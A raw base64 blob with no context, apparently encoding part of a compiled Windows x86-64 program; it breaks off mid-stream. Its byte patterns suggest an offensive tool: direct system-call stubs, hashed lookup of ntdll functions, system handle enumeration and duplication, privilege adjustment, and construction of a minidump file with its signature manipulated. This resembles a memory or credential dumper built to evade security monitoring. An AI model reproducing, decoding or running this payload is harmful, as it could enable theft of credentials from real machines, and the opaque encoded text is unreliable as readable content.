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AhcB1BkiLReDrJINF8AGLRfA7Rexyt4NF+AGBffjzAQAAD4ZO////SI0Fyv7//0iDxFBdw1VIieVIg+wQSIlNEMdF/AAAAADHRfjewDcT6yiLRfyNUAGJVfyJwkiLRRBIAdAPtwBmiUX2D7dV9otF+MHICAHQMUX4i1X8SItFEEgB0A+2AITAdceLRfhIg8QQXcNVU0iB7OgAAABIjawk4AAAAIsFzw4BAIXAdAq4AQAAAOlKBAAAx4Vc////YAAAAIuFXP///2VIiwBIiYVQ////SIuFUP///0iJRchIi0XISItAGEiJRcBIx0X4AAAAAEjHRfAAAAAASItFwEiLQBBIiUXo6aEAAABIi0XoSItAMEiJRfBIi0XwSIlFuEiLRbiLQDxIY9BIi0XwSAHQSIlFsEiLRbBIBYgAAABIiUWoSItFqIsAiUWkg32kAHRMi1WkSItF8EgB0EiJRfhIi0X4i0AMicJIi0XwSAHQSIlFmEiLRZiLAA0gICAgPW50ZGx1G0iLRZhIg8AEiwANICAgID1sLmRsdCTrBJDrAZBIi0XoSIsASIlF6EiLRehIi0AwSIXAD4VO////6wGQSIN9+AB1CrgAAAAA6TEDAABIi0X4i0AYiUXkSItF+ItAHInCSItF8EgB0EiJRZBIi0X4i0AgicJIi0XwSAHQSIlFiEiLRfiLQCSJwkiLRfBIAdBIiUWAx0XgAAAAAEiNBVwNAQBIiYV4////i0Xkg+gBicBIjRSFAAAAAEiLRYhIAdCLAInCSItF8EgB0EiJhXD///9Ii4Vw////D7cAZj1ad3V0i0XgSMHgBEiJwkiLhXj///9IjRwCSIuFcP///0iJweis/f//iQOLReSD6AGJwEiNFABIi0WASAHQD7cAD7fASI0UhQAAAABIi0WQSAHQi1XgSInRSMHhBEiLlXj///9IAcqLAIlCBINF4AGBfeD0AQAAdBCDbeQBg33kAA+FRf///+sBkItF4IkFhgwBAMdF3AAAAADpWgEAAMdF2AAAAADpNQEAAItF2EjB4ARIicJIi4V4////SAHQi1AEi0XYg8ABicBIweAESInBSIuFeP///0gByItABDnCD4b2AAAASMeFQP///wAAAABIx4VI////AAAAAItF2EjB4ARIicJIi4V4////SAHQiwCJhUD///+LRdhIweAESInCSIuFeP///0gB0ItABImFRP///4tF2IPAAYnASMHgBEiJwkiLhXj///9IAdCLVdhIidFIweEESIuVeP///0gByosAiQKLRdiDwAGJwEjB4ARIicJIi4V4////SAHQi1XYSInRSMHhBEiLlXj///9IAcqLQASJQgSLRdiDwAGJwEjB4ARIicJIi4V4////SAHCi4VA////iQKLRdiDwAGJwEjB4ARIicJIi4V4////SAHCi4VE////iUIEg0XYAYsFMwsBACtF3IPoATlF2A+Ctv7//4NF3AGLBRoLAQCD6AE5RdwPgpT+//9Ii4V4////SIPAEItQBEiLhXj///+LSASJ0CnIiYVs////x0XUAAAAAOtZi0XUSMHgBEiJwkiLhXj///9IAdCLQASJwkiLRfBIAdBIiYVg////i0XUSMHgBEiJwkiLhXj///9IjRwCi5Vs////SIuFYP///0iJwegb+v//SIlDCINF1AGLBYQKAQCD6AE5RdRymbgBAAAASIHE6AAAAFtdw1VIieVIg+wwiU0Q6Hf7//+FwHUHuP/////rO8dF/AAAAADrIotF/EjB4ARIicJIjQVACgEAiwQCOUUQdQWLRfzrFINF/AGLBSEKAQA5Rfxy07j/////SIPEMF3DVUiJ5UiD7DCJTRDoG/v//4XAdQe4AAAAAOtNx0X8AAAAAOs0i0X8SMHgBEiJwkiNBeQJAQCLBAI5RRB1F4tF/EjB4ARIicJIjQXTCQEASIsEAusUg0X8AYsFswkBADlF/HLBuAAAAABIg8QwXcNIx8AAAAAAw5APC0iLBCTDkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuQ8qm80AAAAAUUiD7CjoV////0iDxChZUEiD7Cjo7P7//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuS8av/8AAAAAUUiD7Cjo/f7//0iDxChZUEiD7Cjokv7//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8FndYsRUUiD7Cjopv7//0iDxChZUEiD7CjoO/7//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8E/01IiUUiD7CjoT/7//0iDxChZUEiD7Cjo5P3//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuaIVqY8AAAAAUUiD7Cjo9f3//0iDxChZUEiD7Cjoiv3//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuSC8vL0AAAAAUUiD7Cjom/3//0iDxChZUEiD7CjoMP3//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8GA6ZMDUUiD7CjoRP3//0iDxChZUEiD7Cjo2fz//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EyG6sXUUiD7Cjo7fz//0iDxChZUEiD7Cjogvz//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EbA5UFUUiD7Cjolvz//0iDxChZUEiD7CjoK/z//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EFL5MBUUiD7CjoP/z//0iDxChZUEiD7Cjo1Pv//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIubaOAZYAAAAAUUiD7Cjo5fv//0iDxChZUEiD7Cjoevv//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EaKrIkUUiD7Cjojvv//0iDxChZUEiD7CjoI/v//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuaDQOPUAAAAAUUiD7CjoNPv//0iDxChZUEiD7Cjoyfr//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8GPLFtKUUiD7Cjo3fr//0iDxChZUEiD7Cjocvr//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuROkv5wAAAAAUUiD7Cjog/r//0iDxChZUEiD7CjoGPr//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8FP9iMOUUiD7CjoLPr//0iDxChZUEiD7Cjowfn//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8HjdmNCUUiD7Cjo1fn//0iDxChZUEiD7Cjoavn//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EaarJkUUiD7Cjofvn//0iDxChZUEiD7CjoE/n//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8GgZC5lUUiD7CjoJ/n//0iDxChZUEiD7CjovPj//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EMMp8dUUiD7Cjo0Pj//0iDxChZUEiD7CjoZfj//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8E2cZEnUUiD7Cjoefj//0iDxChZUEiD7CjoDvj//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8GEg5wJUUiD7CjoIvj//0iDxChZUEiD7Cjot/f//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8GHX74aUUiD7Cjoy/f//0iDxChZUEiD7CjoYPf//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuepivbwAAAAAUUiD7Cjocff//0iDxChZUEiD7CjoBvf//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuW260YoAAAAAUUiD7CjoF/f//0iDxChZUEiD7CjorPb//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuQ+Yl4wAAAAAUUiD7Cjovfb//0iDxChZUEiD7CjoUvb//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuaeMOqYAAAAAUUiD7CjoY/b//0iDxChZUEiD7Cjo+PX//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIufkSafAAAAAAUUiD7CjoCfb//0iDxChZUEiD7CjonvX//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EYOaNzUUiD7CjosvX//0iDxChZUEiD7CjoR/X//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8H7Xqt8UUiD7CjoW/X//0iDxChZUEiD7Cjo8PT//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EeXJg4UUiD7CjoBPX//0iDxChZUEiD7CjomfT//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuYJN34QAAAAAUUiD7CjoqvT//0iDxChZUEiD7CjoP/T//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LkJCQkJCQkJCQVUiJ5UiD7DBIiU0QSIlVGEyJRSBMiU0oSI1FIEiJRfBIi1XwSItFGEmJ0EiJwkiLTRDoCU8AAIlF/ItF/EiDxDBdw1VIieVIg+wwx0X8AQAAAEiNBcfAAABIiUXwSI1F8EG4AQAAALoBAAAASInB6AwAAACJRfyLRfxIg8QwXcNVU0iD7EhIjWwkQEiJTSCJVShEiUUwSMdF6AAAAABIjUXoSYnAuigAAABIx8H/////6Jz1//+JRfiDffgAeQq4AAAAAOnWAAAAx0X8AAAAAOmlAAAAi0X8SJhIjRTFAAAAAEiLRSBIAdBIixBIi0Xoi00wQYnISInB6KgAAACJRfSDffQAdW9Ii0XoSInB6Oj0//9Ix0XoAAAAAItF/EiYSI0UxQAAAABIi0UgSAHQSIsYuQEAAABIiwXSrQAA/9BJidhIjRX4vwAASInB6K7+//+5AQAAAEiLBbKtAAD/0EiNFfe/AABIicHokf7//7gAAAAA6ymDRfwBi0X8OUUoD4dP////SItF6EiJwehp9P//SMdF6AAAAAC4AQAAAEiDxEhbXcNVU0iB7IgAAABIjawkgAAAAEiJTSBIiVUoRIlFMMdF/AAAAADHRdAIAAAAx0X4AAAAAMdFzAAAAABIx0XwAAAAAEjHRcAAAAAAx0XIAAAAAEjHRbAAAAAASMdFuAAAAABIx0XoAAAAAMdF5AEAAMC6AQ